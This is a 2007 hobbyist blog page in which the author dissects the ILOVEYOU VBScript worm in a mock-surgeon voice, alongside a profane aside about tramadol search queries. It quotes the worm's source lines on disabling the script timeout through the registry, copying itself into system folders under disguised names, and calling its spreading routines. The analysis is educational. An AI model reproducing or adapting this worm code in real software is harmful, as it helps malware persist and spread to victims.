Showing posts with label virus autopsy. Show all posts
Showing posts with label virus autopsy. Show all posts

17.12.07

for the last time:

tramadol fuck you up?
"windows scripting host\settings\timeout"
how much tramadol fucks you up
will tramadol fuck you up
does tramadol fuck you up
solpadol
does Tramadol fuck you up ?
YES, for fuck's sake, tramadol fucks you up. it fucks you up bad. you won't be able to program properly, you sure as shit won't be able to do maths, you won't even feel like trying to do sports or anything active, you'll throw up all the time, you'll look and sound like an authentic pothead and you'll lose any interest you ever had in anything but sleep.

[kudos to the guy who kept looking for the Registry setting that messes with the WSH's timeout, though. it's under HKLM/Software/Microsoft/Windows iirc, and its main malicious use is to get rid of the timeout completely so viruses can run free and never be killed because of inactivity.]

mang, i hope i don't get readers who hate profanity.

L

14.9.07

virus autopsy: ILOVEYOU, pt.2

*click* returning to the autopsy of the ILOVEYOU virus. time is 2340, at the last session we saw the subject's mechanisms for stopping timeouts, allowing itself to remain active indefinitely. it's time to look at some more. forceps!

025 ' Create 3 copies of the script in Windows, system and in the temporary folders
026 set dirwin = fso.GetSpecialFolder(0)
027 set dirsystem = fso.GetSpecialFolder(1)
028 set dirtemp = fso.GetSpecialFolder(2)
029 set c = fso.getFile(WScript.ScriptFullName)
030 c.Copy(dirsystem&"\MSKernel32.vbs")
031 c.Copy(dirWin&"\Win32DLL.vbs")
032 c.Copy(dirtemp&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
033
ah, how very devious! how marvellously malicious... or perhaps not. (note the inelegant coding, once again.) what it's doing here is using the fso object it created earlier to copy itself to three locations: the root of the Windows directory, that of the temp directory, and that of the System directory. these are generally the first three locations modern AV ware will scan, because they're obvious choices. let's see what it wants to do next. scalpel!
034 ' Adjust Internet Explorer's standard starting page to one of the 4 URLs, in order to download data that you will be able to launch
035 'download. If this data has already been downloaded it will automatically be started next time Windows is booted
036 'and the start page of Internet Explorer is reset to a blank page.
037 regruns()
038 'create an HTML that launches the component ActiveX as well as one of the copies of the script
039 html()
040 ' Send the copy of the script to all entries in the Outlook address book
041 spreadtoemail()
042 'overwrite specific data using the script
043 'if the data are not yet scripts, script data with the same name as the data are created
044 'with the ending .vbs
045 'delete the original data
046 'a script that automatically sends the Email worm to all persons in the IRC channel is attached to Mirc
047 listadriv()
048 end sub
hm. here we see it calling four subroutines, regruns(), html(), spreadtoemail(), and listadriv(), and quitting. next time we'll be looking at the regruns() process, its first port of call. shove it back in the freezer, nurse. time is 0011. *click*

10.9.07

virus autopsy: ILOVEYOU, part 1

*click* 2213 hours. subject... whoof, subject's been in the virus mortuary for a good long while now, that's disgusting. subject appears to have been a VBScript email-propagator by the name of ILOVEYOU, recieved as an attachment and requiring a manual launch by the user to activate.

scalpel. thorax incision reveals...

001 rem barok -loveletter(vbe) (i hate go to school)
002 rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila, Philippines
003
004 On Error Resume Next
005 dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy
006
007 eq = ""
008 ctr = 0
009 set fso = CreateObject("Scripting.FileSystemObject")
010 set file = fso.OpenTextFile(WScript.ScriptFullname, 1)
011 vbscopy = file.ReadAll
012
ach, handkerchief. handkerchief! thankyou nurse. aside from an infestation of bad English, subject is Filipino and seems to have been healthy at time of death. here you see the variable declarations, all in good health, and the inelegant initialisations of three of them just to read the filesystem... i'll remove them and go under the ribcage.
013 main()
014
015 sub main()
016 On Error Resume Next
017 dim wscr,rr
018 set wscr=CreateObject("WScript.Shell")
019 ' checks the time out of Windows scripting host
020 rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
021 if (rr>=1) then
022 ' change the script to endless:
023 wscr.RegWrite(HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD")
024 end if
alright, hold it there, nurse. you see that? the thing's setting the Windows Scripting virtual machine's timeout to zero, to stop it from timing out and exiting before the script is finished. devious, but not devious enough... i think we're done for tonight, nurse.

next time, we're gonna be getting to the real meat of this autopsy - i'll be dissecting the main processes of the virus, and you'll get to be personally splattered in the gore.